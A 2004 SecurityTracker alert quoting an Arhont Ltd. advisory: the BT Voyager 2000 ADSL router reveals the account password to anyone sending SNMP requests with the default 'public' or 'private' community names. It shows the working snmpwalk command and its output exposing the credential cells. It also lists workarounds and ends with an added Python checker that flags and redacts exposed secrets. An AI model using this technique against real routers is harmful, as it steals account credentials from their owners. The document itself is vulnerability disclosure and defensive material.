
Category:  Device (Router/Bridge/Hub)  >  BT Voyager 2000 Wireless ADSL Router
Vendors:  BT
BT Voyager 2000 Wireless ADSL Router Discloses Passwords Via SNMP
SecurityTracker Alert ID:  1010563
SecurityTracker URL:  http://securitytracker.com/id?1010563
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 22 2004
Impact:  Disclosure of authentication information
Exploit Included:  Yes  
Advisory:  Arhont Ltd.
Description:  A vulnerability was reported in the BT Voyager 2000 Wireless ADSL Router. A remote user can obtain the ADSL account password.

Konstantin Gavrilenko of Arhont Ltd. reported that a remote user on the wireless-side interface can send SNMP packets using the default public or private community name to obtain the account password.

The vendor was reportedly notified on June 10, 2004.

Impact:  A remote user on the wireless interface can obtain the ADSL account password.
Solution:  No solution was available at the time of this entry.

The author of the report has provided the following workarounds [quoted]:

- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support

Vendor URL:  www.bt.com/
Cause:  Access control error
Reported By:  "Konstantin V. Gavrilenko" <mlists@arhont.com>
Message History:   None.


 Source Message Contents

Date:  Tue, 22 Jun 2004 07:47:21 +0100
From:  "Konstantin V. Gavrilenko" <mlists@arhont.com>
Subject:  [Full-Disclosure] Wireless Modem (BT Voyager 2000 Wireless ADSL Router cleartext password)

 

Arhont Ltd. - Information Security

Arhont Advisory by:	Konstantin Gavrilenko (http://www.arhont.com)
Advisory:               cleartext account password obtainable using SNMP
Class:			design/configuration bug
Test platform:		BT Voyager 2000 Wireless ADSL Router
Vendor Contact Date:    10/06/2004
PD* release date:	22/06/2004


DETAILS:

It is possible to obtain the ADSL account password from the wireless
side of the mentioned router. Provided the attacker can associate to the
router, he/she can grab SNMP strings from the router using the default
public/private community name.

Furthermore, the information provided with the public and private community
names is identical, differing only in that with private you can
obviously change the SNMP strings.



e.g.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING: "name.surname@btbroadband.com"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"
[snip]



Risk Factor: High/Medium

Workarounds:
- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support



*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer 7 days before
releasing them to the public domains (such as CERT, BUGTRAQ, OSVDB).

If you would like to get more information about this issue, please do
not hesitate to contact the Arhont team.




-- 
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web:    http://www.arhont.com
	http://www.wi-foo.com
e-mail: k.gavrilenko@arhont.com

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0x4F3608F7
PGP: Server - keyserver.pgp.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
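
A defender's check for the exposure described in the advisory, as an added example that is not part of the advisory or of SecurityTracker's entry: it parses saved `snmpwalk` output in the symbolic form shown above and reports non-empty identity and secret cells without echoing the secret. It assumes the table at `transmission.23.2.3.1` follows the PPP Security MIB (RFC 1472) column layout (5 = identity, 6 = secret); the function names and sample values are constructed.

```python
import re

# Assumption: the secrets table is the PPP Security MIB (RFC 1472) one at
# transmission.23.2.3.1, where column 5 is the identity and column 6 the secret.
SECRETS_ENTRY = "transmission.23.2.3.1."
COLUMNS = {"5": "identity", "6": "secret"}
ROW = re.compile(r'^(?P<oid>[^\s"=]+)\s+=\s*(?:[A-Za-z0-9-]+:\s*)?(?P<value>.*)$')

# Constructed sample shaped like the walk in the advisory, including a value
# that was wrapped onto the following line.
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:
"user@example.invalid"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "constructed-secret"
"""

def parse_walk(text):
    """Return (oid, value) pairs, re-joining values wrapped onto the next line."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        match = ROW.match(line)
        if match:
            rows.append([match.group("oid"), match.group("value")])
        elif line and rows and not line.startswith("["):  # skip "[snip]" markers
            rows[-1][1] = (rows[-1][1] + " " + line).strip()
    return [(oid, value.strip().strip('"')) for oid, value in rows]

def exposed_credentials(text):
    """Flag non-empty identity/secret cells; the secret value is never returned."""
    findings = []
    for oid, value in parse_walk(text):
        _, found, suffix = oid.partition(SECRETS_ENTRY)
        column, _, index = suffix.partition(".")
        kind = COLUMNS.get(column) if found and value else None
        if kind:
            shown = value if kind == "identity" else "<redacted, %d chars>" % len(value)
            findings.append({"kind": kind, "index": index, "oid": oid, "value": shown})
    return findings

if __name__ == "__main__":
    for finding in exposed_credentials(SAMPLE_WALK):
        print(finding)
```

Run it on a walk captured after applying the workarounds; an empty result means the secrets table no longer returns populated cells to that community name.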

 



Copyright 2004, SecurityGlobal.net LLC